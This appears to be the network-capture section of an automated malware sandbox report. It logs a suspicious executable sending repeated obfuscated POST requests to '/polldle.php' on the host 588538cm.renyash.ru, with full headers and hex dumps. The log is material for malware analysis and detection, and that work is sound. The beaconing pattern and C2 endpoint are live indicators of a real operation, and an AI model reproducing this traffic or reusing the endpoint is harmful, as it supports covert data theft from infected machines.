                                                                                Jan 11, 2025 23:32:53.239368916 CET2504OUTData Raw: 5d 5b 54 56 5a 46 5a 5c 54 5d 55 5a 50 54 59 5e 50 54 5a 5b 57 5d 50 57 5b 5c 42 5c 5e 57 5e 56 42 5b 5e 45 53 5f 54 54 5b 5b 51 54 5e 5b 5c 43 5a 51 58 5c 46 5a 5a 56 5e 59 57 5e 55 52 54 50 5e 57 5a 44 54 45 55 51 43 5b 5b 5e 5f 5d 59 50 56 53
                                                                                Data Ascii: ][TVZFZ\T]UZPTY^PTZ[W]PW[\B\^W^VB[^ES_TT[[QT^[\CZQX\FZZV^YW^URTP^WZDTEUQC[[^_]YPVS_[TDT_RVYZ][TWY[[U_W_]^]A^]UYSPF_\XW[QSU\]STZUZPUP[^\YBZPPU[[[Y^Q_UR]A\[]PVCWWF_]\Z_^\X\QZUYRQYT__]YXU#,#&8$20?*#<=Y8;[+?<&U6-##23?#X'/\/
                                                                                Jan 11, 2025 23:32:53.340876102 CET25INHTTP/1.1 100 Continue
                                                                                Jan 11, 2025 23:32:53.554296970 CET25INHTTP/1.1 100 Continue
                                                                                Jan 11, 2025 23:32:53.571986914 CET803INHTTP/1.1 200 OK
                                                                                Date: Sat, 11 Jan 2025 22:32:53 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                cf-cache-status: DYNAMIC
                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=s0DrOxA6FUTRW3AXwpBpRzq8n%2BWHMIBNiesGTTOb1DDhcTKMeZwYjABD120S%2BuFpLPAP0i80oeOcVmIynFlpQEQqQiKrFxi0zU6NPeBJE5fhzsUNPllAlniMm7SKtf2Vto6VtsAY"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 90085d851bd0ef9d-EWR
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=8589&min_rtt=2017&rtt_var=13900&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=2799&delivery_rate=26742&cwnd=145&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                Data Raw: 34 0d 0a 3c 59 57 5b 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: 4<YW[0


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                3192.168.2.449739104.21.38.84808604C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Jan 11, 2025 23:32:53.839603901 CET319OUTPOST /polldle.php HTTP/1.1
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                                                Host: 588538cm.renyash.ru
                                                                                Content-Length: 2496
                                                                                Expect: 100-continue
                                                                                Connection: Keep-Alive
                                                                                Jan 11, 2025 23:32:54.192253113 CET2496OUTData Raw: 5d 5e 54 55 5f 42 5a 5a 54 5d 55 5a 50 5c 59 58 50 50 5a 5d 57 57 50 5a 5b 5c 42 5c 5e 57 5e 56 42 5b 5e 45 53 5f 54 54 5b 5b 51 54 5e 5b 5c 43 5a 51 58 5c 46 5a 5a 56 5e 59 57 5e 55 52 54 50 5e 57 5a 44 54 45 55 51 43 5b 5b 5e 5f 5d 59 50 56 53
                                                                                Data Ascii: ]^TU_BZZT]UZP\YXPPZ]WWPZ[\B\^W^VB[^ES_TT[[QT^[\CZQX\FZZV^YW^URTP^WZDTEUQC[[^_]YPVS_[TDT_RVYZ][TWY[[U_W_]^]A^]UYSPF_\XW[QSU\]STZUZPUP[^\YBZPPU[[[Y^Q_UR]A\[]PVCWWF_]\Z_^\X\QZUYRQYT__]YXU#A:U9$;?11>%<.#<*;Y(?/&36W.B+#10(#X'/\/0
                                                                                Jan 11, 2025 23:32:54.284044981 CET25INHTTP/1.1 100 Continue
                                                                                Jan 11, 2025 23:32:54.554116011 CET798INHTTP/1.1 200 OK
                                                                                Date: Sat, 11 Jan 2025 22:32:54 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                cf-cache-status: DYNAMIC
                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Qla73u07NXXAywahUUmtNvgf75ZPE7dsNuvDbFQfBaN3iHPcdNcv85PidtW1xJZQ1rdlOcI7lZOMvZFMoBreykyFIGNswyuaUSz7Y4rSCWUsCLA55ohZgG6RCuATPhWghqDK6917"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 90085d8b099b0ca0-EWR
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1770&min_rtt=1747&rtt_var=701&sent=4&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2815&delivery_rate=755693&cwnd=238&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                Data Raw: 34 0d 0a 3c 59 57 5b 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: 4<YW[0


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                4192.168.2.449740104.21.38.84808604C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Jan 11, 2025 23:32:54.889626980 CET319OUTPOST /polldle.php HTTP/1.1
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                                                Host: 588538cm.renyash.ru
                                                                                Content-Length: 2504
                                                                                Expect: 100-continue
                                                                                Connection: Keep-Alive
                                                                                Jan 11, 2025 23:32:55.239274979 CET2504OUTData Raw: 58 5c 54 56 5a 42 5a 58 54 5d 55 5a 50 55 59 5f 50 55 5a 5d 57 57 50 57 5b 5c 42 5c 5e 57 5e 56 42 5b 5e 45 53 5f 54 54 5b 5b 51 54 5e 5b 5c 43 5a 51 58 5c 46 5a 5a 56 5e 59 57 5e 55 52 54 50 5e 57 5a 44 54 45 55 51 43 5b 5b 5e 5f 5d 59 50 56 53
                                                                                Data Ascii: X\TVZBZXT]UZPUY_PUZ]WWPW[\B\^W^VB[^ES_TT[[QT^[\CZQX\FZZV^YW^URTP^WZDTEUQC[[^_]YPVS_[TDT_RVYZ][TWY[[U_W_]^]A^]UYSPF_\XW[QSU\]STZUZPUP[^\YBZPPU[[[Y^Q_UR]A\[]PVCWWF_]\Z_^\X\QZUYRQYT__]YXU#@.0918X19%,27?5;<(<3102,78^!(%#X'/\/
                                                                                Jan 11, 2025 23:32:55.333323002 CET25INHTTP/1.1 100 Continue
                                                                                Jan 11, 2025 23:32:55.582978010 CET807INHTTP/1.1 200 OK
                                                                                Date: Sat, 11 Jan 2025 22:32:55 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                cf-cache-status: DYNAMIC
                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=RG2%2F6IxRip45c0R%2BIrEp68ueTrqb5tlN7EFOg2xnytUSThfoPImaJJWmfHR6CNE6CsRi9bawcFQvhL%2BuMh8vppmXwLNyCUyTMjk1GEGSm%2BaqJsLcBS2UzQrnpM65Q4drqPjfTXIE"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 90085d919a2641af-EWR
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=3201&min_rtt=1936&rtt_var=3256&sent=4&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2823&delivery_rate=121081&cwnd=223&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                Data Raw: 34 0d 0a 3c 59 57 5b 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: 4<YW[0
                                                                                Jan 11, 2025 23:32:56.665577888 CET807INHTTP/1.1 200 OK
                                                                                Date: Sat, 11 Jan 2025 22:32:55 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                cf-cache-status: DYNAMIC
                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=RG2%2F6IxRip45c0R%2BIrEp68ueTrqb5tlN7EFOg2xnytUSThfoPImaJJWmfHR6CNE6CsRi9bawcFQvhL%2BuMh8vppmXwLNyCUyTMjk1GEGSm%2BaqJsLcBS2UzQrnpM65Q4drqPjfTXIE"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 90085d919a2641af-EWR
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=3201&min_rtt=1936&rtt_var=3256&sent=4&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2823&delivery_rate=121081&cwnd=223&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                Data Raw: 34 0d 0a 3c 59 57 5b 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: 4<YW[0
                                                                                Jan 11, 2025 23:32:56.665982008 CET807INHTTP/1.1 200 OK
                                                                                Date: Sat, 11 Jan 2025 22:32:55 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                cf-cache-status: DYNAMIC
                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=RG2%2F6IxRip45c0R%2BIrEp68ueTrqb5tlN7EFOg2xnytUSThfoPImaJJWmfHR6CNE6CsRi9bawcFQvhL%2BuMh8vppmXwLNyCUyTMjk1GEGSm%2BaqJsLcBS2UzQrnpM65Q4drqPjfTXIE"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 90085d919a2641af-EWR
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=3201&min_rtt=1936&rtt_var=3256&sent=4&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2823&delivery_rate=121081&cwnd=223&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                Data Raw: 34 0d 0a 3c 59 57 5b 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: 4<YW[0
                                                                                Jan 11, 2025 23:32:56.666282892 CET807INHTTP/1.1 200 OK
                                                                                Date: Sat, 11 Jan 2025 22:32:55 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                cf-cache-status: DYNAMIC
                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=RG2%2F6IxRip45c0R%2BIrEp68ueTrqb5tlN7EFOg2xnytUSThfoPImaJJWmfHR6CNE6CsRi9bawcFQvhL%2BuMh8vppmXwLNyCUyTMjk1GEGSm%2BaqJsLcBS2UzQrnpM65Q4drqPjfTXIE"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 90085d919a2641af-EWR
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=3201&min_rtt=1936&rtt_var=3256&sent=4&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2823&delivery_rate=121081&cwnd=223&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                Data Raw: 34 0d 0a 3c 59 57 5b 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: 4<YW[0


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                5192.168.2.449745104.21.38.84808604C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Jan 11, 2025 23:32:57.746032000 CET319OUTPOST /polldle.php HTTP/1.1
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                                                Host: 588538cm.renyash.ru
                                                                                Content-Length: 1616
                                                                                Expect: 100-continue
                                                                                Connection: Keep-Alive
                                                                                Jan 11, 2025 23:32:58.098711967 CET1616OUTData Raw: 5d 5d 51 53 5a 49 5f 5f 54 5d 55 5a 50 5d 59 50 50 5c 5a 5f 57 56 50 5f 5b 5c 42 5c 5e 57 5e 56 42 5b 5e 45 53 5f 54 54 5b 5b 51 54 5e 5b 5c 43 5a 51 58 5c 46 5a 5a 56 5e 59 57 5e 55 52 54 50 5e 57 5a 44 54 45 55 51 43 5b 5b 5e 5f 5d 59 50 56 53
                                                                                Data Ascii: ]]QSZI__T]UZP]YPP\Z_WVP_[\B\^W^VB[^ES_TT[[QT^[\CZQX\FZZV^YW^URTP^WZDTEUQC[[^_]YPVS_[TDT_RVYZ][TWY[[U_W_]^]A^]UYSPF_\XW[QSU\]STZUZPUP[^\YBZPPU[[[Y^Q_UR]A\[]PVCWWF_]\Z_^\X\QZUYRQYT__]YXU#:3$(/23?"?!;87Y+12V-8[!2((%#X'/\/
                                                                                Jan 11, 2025 23:32:58.190722942 CET25INHTTP/1.1 100 Continue
                                                                                Jan 11, 2025 23:32:58.440850973 CET951INHTTP/1.1 200 OK
                                                                                Date: Sat, 11 Jan 2025 22:32:58 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                cf-cache-status: DYNAMIC
                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kRdrsJU51lf3pwpoeaqe5QCmQjQGQhMaICmOhcQr89C6Xhuv3UpUvp6JJEvxeYJiLTVYQOtapzIQt%2BIOHznOQW%2BNy5whLUkVmztfYxNgJDpwXurzaDHzOt5NXYR0zmhURhbP7tF3"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 90085da36e308c3c-EWR
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1898&min_rtt=1880&rtt_var=718&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1935&delivery_rate=776595&cwnd=223&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                Data Raw: 39 38 0d 0a 0e 11 2e 1f 24 0a 05 04 29 3a 23 59 39 3b 3c 05 2c 22 3f 03 3e 21 26 17 34 07 12 1e 31 1c 0e 50 3f 39 21 08 2b 5c 2b 1c 23 10 0b 0a 26 39 23 46 0c 1d 22 10 3d 06 20 1b 31 5a 2b 04 2b 23 2e 10 25 54 2c 44 2a 42 3f 54 29 3a 3a 04 22 02 3e 53 28 21 29 57 28 35 2d 07 2c 21 2b 58 32 10 2e 51 0f 16 21 51 21 0f 28 5e 23 13 33 5c 24 30 38 01 29 24 3c 13 25 03 28 57 3c 0a 22 58 2b 1c 05 08 30 13 24 09 31 3c 36 5e 3c 2a 28 0a 28 11 24 5c 23 0f 28 56 05 3f 5b 4d 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: 98.$):#Y9;<,"?>!&41P?9!+\+#&9#F"= 1Z++#.%T,D*B?T)::">S(!)W(5-,!+X2.Q!Q!(^#3\$08)$<%(W<"X+0$1<6^<*(($\#(V?[M0


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                6192.168.2.449752104.21.38.84808604C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Jan 11, 2025 23:32:59.444406986 CET319OUTPOST /polldle.php HTTP/1.1
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                                                Host: 588538cm.renyash.ru
                                                                                Content-Length: 2504
                                                                                Expect: 100-continue
                                                                                Connection: Keep-Alive
                                                                                Jan 11, 2025 23:32:59.801676035 CET2504OUTData Raw: 58 5a 54 50 5f 46 5a 58 54 5d 55 5a 50 54 59 5b 50 52 5a 53 57 57 50 59 5b 5c 42 5c 5e 57 5e 56 42 5b 5e 45 53 5f 54 54 5b 5b 51 54 5e 5b 5c 43 5a 51 58 5c 46 5a 5a 56 5e 59 57 5e 55 52 54 50 5e 57 5a 44 54 45 55 51 43 5b 5b 5e 5f 5d 59 50 56 53
                                                                                Data Ascii: XZTP_FZXT]UZPTY[PRZSWWPY[\B\^W^VB[^ES_TT[[QT^[\CZQX\FZZV^YW^URTP^WZDTEUQC[[^_]YPVS_[TDT_RVYZ][TWY[[U_W_]^]A^]UYSPF_\XW[QSU\]STZUZPUP[^\YBZPPU[[[Y^Q_UR]A\[]PVCWWF_]\Z_^\X\QZUYRQYT__]YXU#9:$8&5$/%V#<_-;4(3T&U6W94 "X?5#X'/\/
                                                                                Jan 11, 2025 23:32:59.909514904 CET25INHTTP/1.1 100 Continue
                                                                                Jan 11, 2025 23:33:00.153682947 CET795INHTTP/1.1 200 OK
                                                                                Date: Sat, 11 Jan 2025 22:33:00 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                cf-cache-status: DYNAMIC
                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=22QctwjEaLfN5kdvAzjKQKHHbFEYNfNtafK%2BclDk2IXSowswA8slHIaRaj0eE4jZMUUszquvAzH0D9dFC3QmsDFNuNNMHHgVG0WrAfgFBdEvJSl41LTekWcXYJHwSzhDTTkGyknU"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 90085dae2eb91a17-EWR
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=4055&min_rtt=1998&rtt_var=4864&sent=2&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2823&delivery_rate=79089&cwnd=127&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                Data Raw: 34 0d 0a 3c 59 57 5b 0d 0a
                                                                                Data Ascii: 4<YW[
                                                                                Jan 11, 2025 23:33:00.244112015 CET5INData Raw: 30 0d 0a 0d 0a
                                                                                Data Ascii: 0


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                7192.168.2.449754104.21.38.84808604C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Jan 11, 2025 23:33:00.722103119 CET319OUTPOST /polldle.php HTTP/1.1
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                                                Host: 588538cm.renyash.ru
                                                                                Content-Length: 2504
                                                                                Expect: 100-continue
                                                                                Connection: Keep-Alive
                                                                                Jan 11, 2025 23:33:01.067326069 CET2504OUTData Raw: 58 51 54 50 5a 47 5f 58 54 5d 55 5a 50 58 59 59 50 51 5a 58 57 5c 50 57 5b 5c 42 5c 5e 57 5e 56 42 5b 5e 45 53 5f 54 54 5b 5b 51 54 5e 5b 5c 43 5a 51 58 5c 46 5a 5a 56 5e 59 57 5e 55 52 54 50 5e 57 5a 44 54 45 55 51 43 5b 5b 5e 5f 5d 59 50 56 53
                                                                                Data Ascii: XQTPZG_XT]UZPXYYPQZXW\PW[\B\^W^VB[^ES_TT[[QT^[\CZQX\FZZV^YW^URTP^WZDTEUQC[[^_]YPVS_[TDT_RVYZ][TWY[[U_W_]^]A^]UYSPF_\XW[QSU\]STZUZPUP[^\YBZPPU[[[Y^Q_UR]A\[]PVCWWF_]\Z_^\X\QZUYRQYT__]YXU#B.)%0$!5$/"7)X/++,+% 1-4(Z"2$+#X'/\/4
                                                                                Jan 11, 2025 23:33:01.185548067 CET25INHTTP/1.1 100 Continue
                                                                                Jan 11, 2025 23:33:01.442842960 CET790INHTTP/1.1 200 OK
                                                                                Date: Sat, 11 Jan 2025 22:33:01 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                cf-cache-status: DYNAMIC
                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kSUCOu1oWCWqikEe62Ks2gfoz1Hy6CkrQ7kcKbo3fVK%2FkQhsf7f5bqVa0t7VwEA8XI1msFEhaEbgXz23f5oNlfW3IMeiXNx82PfQrxeYn2eYUx%2B6SkWYCzLeHXYnjJFX%2BnXxPthB"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 90085db61b2143c3-EWR
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=4429&min_rtt=1711&rtt_var=6079&sent=2&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2823&delivery_rate=62230&cwnd=210&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                Jan 11, 2025 23:33:01.545175076 CET14INData Raw: 34 0d 0a 3c 59 57 5b 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: 4<YW[0


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                8192.168.2.449760104.21.38.84808604C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Jan 11, 2025 23:33:01.919935942 CET319OUTPOST /polldle.php HTTP/1.1
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                                                Host: 588538cm.renyash.ru
                                                                                Content-Length: 2504
                                                                                Expect: 100-continue
                                                                                Connection: Keep-Alive
                                                                                Jan 11, 2025 23:33:02.272572041 CET2504OUTData Raw: 5d 5a 54 56 5a 40 5a 5a 54 5d 55 5a 50 5f 59 59 50 55 5a 59 57 57 50 5b 5b 5c 42 5c 5e 57 5e 56 42 5b 5e 45 53 5f 54 54 5b 5b 51 54 5e 5b 5c 43 5a 51 58 5c 46 5a 5a 56 5e 59 57 5e 55 52 54 50 5e 57 5a 44 54 45 55 51 43 5b 5b 5e 5f 5d 59 50 56 53
                                                                                Data Ascii: ]ZTVZ@ZZT]UZP_YYPUZYWWP[[\B\^W^VB[^ES_TT[[QT^[\CZQX\FZZV^YW^URTP^WZDTEUQC[[^_]YPVS_[TDT_RVYZ][TWY[[U_W_]^]A^]UYSPF_\XW[QSU\]STZUZPUP[^\YBZPPU[[[Y^Q_UR]A\[]PVCWWF_]\Z_^\X\QZUYRQYT__]YXU#9#!2 \2!^3.#!,](<</T%9,4(""#+5#X'/\/(
                                                                                Jan 11, 2025 23:33:02.392760038 CET25INHTTP/1.1 100 Continue
                                                                                Jan 11, 2025 23:33:02.641227961 CET797INHTTP/1.1 200 OK
                                                                                Date: Sat, 11 Jan 2025 22:33:02 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                cf-cache-status: DYNAMIC
                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QV951Y2VX0bOC7G8b7Mf%2FSkaQNcDSWPmEdKkYSlpuA6kIjOEEz9yx5FMFQmhyx4zORabJ7MMJD%2BCG4o1kluiiTonzgQ5KROsgJrwCLvT0ogl0lOGiMQvp2lnLHCzZotIO0ugxobq"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 90085dbdaf322394-EWR
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=6313&min_rtt=1976&rtt_var=9415&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2823&delivery_rate=39809&cwnd=251&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                Data Raw: 34 0d 0a 3c 59 57 5b 0d 0a
                                                                                Data Ascii: 4<YW[
                                                                                Jan 11, 2025 23:33:02.733350039 CET5INData Raw: 30 0d 0a 0d 0a
                                                                                Data Ascii: 0


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                9192.168.2.449763104.21.38.84808604C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Jan 11, 2025 23:33:03.010304928 CET319OUTPOST /polldle.php HTTP/1.1
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                                                Host: 588538cm.renyash.ru
                                                                                Content-Length: 2500
                                                                                Expect: 100-continue
                                                                                Connection: Keep-Alive
                                                                                Jan 11, 2025 23:33:03.364293098 CET2500OUTData Raw: 5d 5a 51 57 5a 47 5a 5c 54 5d 55 5a 50 5c 59 5c 50 50 5a 5b 57 5c 50 5a 5b 5c 42 5c 5e 57 5e 56 42 5b 5e 45 53 5f 54 54 5b 5b 51 54 5e 5b 5c 43 5a 51 58 5c 46 5a 5a 56 5e 59 57 5e 55 52 54 50 5e 57 5a 44 54 45 55 51 43 5b 5b 5e 5f 5d 59 50 56 53
                                                                                Data Ascii: ]ZQWZGZ\T]UZP\Y\PPZ[W\PZ[\B\^W^VB[^ES_TT[[QT^[\CZQX\FZZV^YW^URTP^WZDTEUQC[[^_]YPVS_[TDT_RVYZ][TWY[[U_W_]^]A^]UYSPF_\XW[QSU\]STZUZPUP[^\YBZPPU[[[Y^Q_UR]A\[]PVCWWF_]\Z_^\X\QZUYRQYT__]YXU#:C%8;&22'24%Y;]<($%*U94;#"/Y<#X'/\/4
                                                                                Jan 11, 2025 23:33:03.455404043 CET25INHTTP/1.1 100 Continue


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                10192.168.2.449767104.21.38.84808604C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Jan 11, 2025 23:33:03.558163881 CET319OUTPOST /polldle.php HTTP/1.1
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                                                Host: 588538cm.renyash.ru
                                                                                Content-Length: 1616
                                                                                Expect: 100-continue
                                                                                Connection: Keep-Alive
                                                                                Jan 11, 2025 23:33:03.903790951 CET25INHTTP/1.1 100 Continue
                                                                                Jan 11, 2025 23:33:03.904010057 CET1616OUTData Raw: 58 50 51 57 5f 45 5f 58 54 5d 55 5a 50 5f 59 50 50 50 5a 52 57 54 50 59 5b 5c 42 5c 5e 57 5e 56 42 5b 5e 45 53 5f 54 54 5b 5b 51 54 5e 5b 5c 43 5a 51 58 5c 46 5a 5a 56 5e 59 57 5e 55 52 54 50 5e 57 5a 44 54 45 55 51 43 5b 5b 5e 5f 5d 59 50 56 53
                                                                                Data Ascii: XPQW_E_XT]UZP_YPPPZRWTPY[\B\^W^VB[^ES_TT[[QT^[\CZQX\FZZV^YW^URTP^WZDTEUQC[[^_]YPVS_[TDT_RVYZ][TWY[[U_W_]^]A^]UYSPF_\XW[QSU\]STZUZPUP[^\YBZPPU[[[Y^Q_UR]A\[]PVCWWF_]\Z_^\X\QZUYRQYT__]YXU#-6E$8$"%]0/&"?&;;8?3V1&.B?#1/Y*%#X'/\/(
                                                                                Jan 11, 2025 23:33:04.230988026 CET962INHTTP/1.1 200 OK
                                                                                Date: Sat, 11 Jan 2025 22:33:04 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                cf-cache-status: DYNAMIC
